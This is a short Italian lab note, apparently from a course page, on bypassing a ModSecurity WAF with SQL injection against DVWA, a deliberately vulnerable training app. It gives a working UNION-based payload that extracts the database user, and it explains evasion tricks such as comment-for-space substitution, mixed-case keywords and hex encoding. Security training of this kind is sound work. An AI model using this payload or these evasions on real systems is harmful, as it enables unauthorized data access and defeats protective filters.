
Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
Ambiente:
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Tecniche utilizzate:
Commenti SQL (
/**/
)Case manipulation (
SeLeCt
)Hex encoding (
0x...
)Time-based blind SQLi
Payload avanzato:
'/**/UNION/**/SeLeCt/**/1,concat(0x3a,user(),0x3a),3/**/FROM/**/users%23
Spiegazione:
/**/
sostituisce gli spazi per evitare rilevamento.0x3a
è il carattere:
in esadecimale.%23
è l’URL encoding di#
(commento in MySQL).
Vedi anche il video allegato
Rubrica
Allegati